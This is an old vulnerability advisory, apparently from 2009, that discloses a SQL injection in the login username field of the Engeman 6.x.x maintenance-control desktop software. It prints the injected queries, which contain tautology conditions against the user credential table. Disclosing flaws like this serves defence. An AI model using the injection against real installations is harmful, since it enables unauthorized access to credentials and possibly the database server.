Docstoc

Engeman 6.x.x SQL Injection

Document Sample
Engeman 6.x.x SQL Injection Powered By Docstoc
					                                          Engeman 6.x.x SQL Injection                                Page 1/1
   1   Engeman is a Brasilian software for maintenance control.
   2
   3   Version tested: 6.x.x and prior. Next versions appears vulnerable too.
   4
   5   The attacker can inject sql codes in username   textbox:
   6
   7   SQL dump affter injection:
   8
   9   select nome,senha,diasexp,dataltsen,permitetroca from cfgusr where nome=’NULL’ OR NOME<>’1’
  10
  11   select nomegrupo from cfgusr where ignoragrupo=’N’ and nome=’NULL’ OR NOME=’1’
  12
  13   In firebird the attack have a low impact, but in SQL Server may compromisse the server.
  14
  15   **** The version tested is a made in DELPH language, NOT is a Web Software! ****
  16
  17   Vendor site: www.engeman.com.br.
  18
  19   Plase, give the credits to: Crash and _Sl0t_ − DcLabs
  20
  21   Trank´s.




crashbrz                                                                                             09/25/2009

				
DOCUMENT INFO